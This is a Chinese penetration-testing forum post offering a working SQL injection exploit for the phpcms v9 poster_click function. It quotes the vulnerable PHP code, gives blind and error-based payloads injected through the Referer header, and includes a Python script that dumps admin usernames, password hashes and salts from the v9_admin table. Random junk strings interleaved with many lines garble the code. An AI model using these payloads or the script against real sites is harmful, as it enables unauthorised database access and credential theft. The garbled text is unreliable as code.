中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]
作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
% |1 d, |; [* i/ b% }. i1 z: A3 L& O! \. J$ `+ m
问题函数\phpcms\modules\poster\index.php4 y5 _6 G! `% U9 A

: d2 u/ c' e) Q& N* E- Npublic function poster_click() {9 i. o: O! m) t2 |& a( q
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 {6 V5 |' F4 d( Y+ H0 {$r = $this->db->get_one(array('id'=>$id));3 S9 L: X& m1 g4 W% j3 ]
if (!is_array($r) && empty($r)) return false;
3 b2 m( f  s0 ?$ip_area = pc_base::load_sys_class('ip_area');
. d, e2 W2 \% Z7 P7 E6 J% e  {  Q  G$ip = ip();! D; b, T) V0 _
$area = $ip_area->get($ip);
" x* Y+ Y5 H3 ]1 y: g7 w$username = param::get_cookie('username') ? param::get_cookie('username') : '';
2 w5 Q5 j0 T- y3 `& m. Oif($id) {" `/ I. A1 L- A: ?- o
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
  f$ N$ E  }& P9 f( `! O2 m$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));4 `2 j% T4 y- T$ [1 D
}
4 V) }5 i# ]5 q7 b& B+ X7 h$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
8 E  ]5 \3 g* ]5 U% O, Y$setting = string2array($r['setting']);0 j, y4 a- e; T2 v) V
if (count($setting)==1) {
+ Z) |8 {7 C1 E! F, u. g2 L$url = $setting['1']['linkurl'];8 D3 K" @$ i  H' u) R: _
} else {
+ U' e3 M5 S9 [9 w3 ^# w/ |1 x$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];7 j7 T( i2 c# f- H
}
  Q* O( V( y  c- Hheader('Location: '.$url);
( m" U3 E) f# b( ^}
9 z( k9 x$ d1 e1 ^
. m8 \( n4 X. n 2 H2 I+ {7 k. Y& p$ A) m; f/ L

: V. K& \5 G+ K) F/ T利用方式:
% g! w1 ?4 C4 i: I
, t( I' q( [/ Z: q9 ?1、可以采用盲注入的手法:8 X. Z, q. j* |( x; T
2 b/ @1 c% G1 g+ r  E. J- _
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#5 s+ Z, P9 b- w/ F
, k) k+ i3 d" }8 {
通过返回页面,正常与否一个个猜解密码字段。
0 T% B+ `7 T( \# T/ l4 z6 a
3 ~6 W/ c1 I! y$ @. }2、代码是花开写的,随手附上了:# ?- x, P/ [8 P  s/ r  p
2 h) S: ^9 ?  \' _+ _& @
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
1 r* T. b5 I, |8 m3 o$ p6 x
8 c3 |+ ~. |$ R" v" c此方法是爆错注入手法,原理自查。4 m! `9 {2 ~! m
# B( I, J1 P) Q# O

. t( {% X! V) c) t* T; O  `/ r/ O: I$ @8 R
利用程序:
+ U) c0 P9 V( h* p
9 }0 f) N8 v  y; V#!/usr/bin/env python
$ Y8 Y4 K- J6 K. U5 Q  himport httplib,sys,re9 V% i: S7 m6 ?( T
$ b9 \- w1 s, u9 x$ _, [' Z* N
def attack():$ x( Y. p# o; p% ?  C9 n7 f
print “Code by Pax.Mac Team conqu3r!”2 ]. J+ r  @1 Q5 o; j3 ]8 v
print “Welcome to our zone!!!”9 [2 D1 ]% \8 ^0 o
url=sys.argv[1]
, T. H: ]  f6 R7 M4 j' Wpaths=sys.argv[2]
" l/ K' U+ i) _. F0 ~3 nconn = httplib.HTTPConnection(url)
1 l' |6 y" i  }: D0 D* G, B. zi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,3 M! p( h  Q, R8 z9 r+ S! I
“Accept”: “text/plain”,
/ v; ]& B' O# A, d“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}! v! Y7 W9 [1 P2 w4 n9 X+ n
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)6 Y  S! M1 D2 R1 D" n
r1 = conn.getresponse()
6 m; N' v* a5 Odatas=r1.read()! d3 K) ?! Z0 o9 ]+ f
datas=re.findall(r”Duplicate entry \’\w+’”, datas)9 \0 K; a8 H6 i4 o' b5 Y$ L; z
print datas[0]+ Y6 y2 T, v1 ^9 j9 h
conn.close()
4 c# ]$ P3 X: r& L! O' uif __name__==”__main__”:
. V$ Y9 Q# H8 }+ _if len(sys.argv)<3:
3 {7 F5 f. j" h% `8 B1 Rprint “Code by Pax.Mac Team conqu3r”
) F) `9 \) Z$ N' ^) ?print “Usgae:”
. g: I  O. N7 @9 T% {! V* Iprint “    phpcmsattack.py   www.paxmac.org /”8 r7 {" v0 A8 P# v
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”3 y. h1 ?& v. ]' G  j; ?7 L& Y) K
sys.exit(1)
* t" \" e- q8 ]4 o& I; @attack()7 U3 q5 C# x/ A# v

9 h- _7 d/ g( `



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2